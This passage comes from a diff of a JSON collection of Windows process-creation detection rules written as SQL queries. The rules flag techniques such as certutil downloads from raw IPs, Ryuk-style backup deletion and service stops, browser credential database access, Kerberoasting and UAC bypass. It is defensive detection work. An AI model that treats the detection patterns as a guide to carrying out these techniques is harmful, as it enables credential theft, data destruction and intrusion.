ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", - "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to 
conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Execute C# code located in the consoleapp folder", - 
"author": "Beyu Denis, oscd.community", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", - "author": "frack113", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "status": "test", + "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. 
DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. 
It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. 
It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian 
Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Local Groups Reconnaissance Via Wmic.EXE", - "id": "164eda96-11b2-430b-85ff-6a265c15bf32", - "status": 
"experimental", - "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Scheduled Task Creation", + "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "status": "test", + "description": "Detects the creation of scheduled tasks in user session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_group.yml" + "filename": "proc_creation_win_schtasks_creation.yml" }, { - "title": "Suspicious Reg Add Open Command", - "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", - "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + 
"status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' 
ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", - "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use by a software developer." 
+ "Other programs that use these command line option and accepts an 'All' parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Curl.EXE Execution", - "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Executables in the Downloads 
folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_execution.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "status": "test", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ 
- "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR 
CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", + "author": "frack113", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR 
CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Suspicious Tasklist Discovery Command", - "id": "63332011-f057-496c-ad8d-d2b6afb27f96", - "status": "test", - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "status": "experimental", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1057" + "attack.t1087.001" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Administrative activity" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR 